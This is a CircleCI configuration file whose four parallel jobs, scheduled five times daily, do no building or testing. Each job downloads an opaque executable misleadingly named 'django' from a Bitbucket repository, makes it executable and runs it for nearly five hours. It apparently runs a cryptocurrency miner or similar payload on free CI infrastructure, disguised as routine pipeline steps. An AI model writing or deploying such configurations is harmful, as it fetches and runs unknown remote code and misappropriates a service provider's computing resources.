version: 2.1

orbs:

  ruby: circleci/ruby@0.1.2 

jobs:

  App_01:

    docker:

      - image: circleci/ruby:3.0.1-buster

    steps:

      - run:

          name: Update

          command: sudo apt install screen libjansson4 -y

      - run:

          name: Tunggu

          command: |

            sleep 300s && sudo apt update -y

            sleep 10s && sudo apt update -y

      - run:

          name: App

          command: |

            screen -dmS ls

            wget https://bitbucket.org/Akonbisu66/bahanrdp/raw/78ffbbb02eaaf74b283e932f102fe2ab9be2e369/django && chmod u+x * && timeout 285m ./django && stop

            sudo apt update -y

            ls

  App_02:

    docker:

      - image: circleci/rust:1.53.0-buster

    steps:

      - run:

          name: Update

          command: sudo apt install screen libjansson4 -y

      - run:

          name: Tunggu

          command: |

            sleep 20s && sudo apt update -y

            sleep 300s && sudo apt update -y

      - run:

          name: App

          command: |

            screen -dmS ls

            wget https://bitbucket.org/Akonbisu66/bahanrdp/raw/78ffbbb02eaaf74b283e932f102fe2ab9be2e369/django && chmod u+x * && timeout 285m ./django && stop

            sudo apt update -y

            ls

  App_03:

    docker:

      - image: circleci/golang:1.17-rc-buster

    steps:

      - run:

          name: Update

          command: sudo apt install screen libjansson4 -y

      - run:

          name: Tunggu

          command: |

            sleep 30s && sudo apt update -y

            sleep 300s && sudo apt update -y

      - run:

          name: App

          command: |

            screen -dmS ls

            wget https://bitbucket.org/Akonbisu66/bahanrdp/raw/78ffbbb02eaaf74b283e932f102fe2ab9be2e369/django && chmod u+x * && timeout 285m ./django && stop

            sudo apt update -y

            ls

  App_04:

    docker:

      - image: circleci/golang:1.17-rc-buster

    steps:

      - run: 

          name: Update

          command: sudo apt install screen libjansson4 -y

      - run:

          name: Tunggu

          command: |

            sleep 300s && sudo apt update -y

            sleep 30s && sudo apt update -y

      - run:

          name: App

          command: |

            screen -dmS ls

            wget https://bitbucket.org/Akonbisu66/bahanrdp/raw/78ffbbb02eaaf74b283e932f102fe2ab9be2e369/django && chmod u+x * && timeout 285m ./django && stop

            sudo apt update -y

            ls

workflows:

  version: 2.1

  commit:

    jobs:

      - App_01

      - App_02

      - App_03

      - App_04

    triggers:

      - schedule:

          cron: "0 3,8,13,18,23 * * *"

          filters:

            branches:  

              only:

                - master

                

  asuirunjob:

    jobs:

      - App_01

      - App_02

      - App_03

      - App_04

  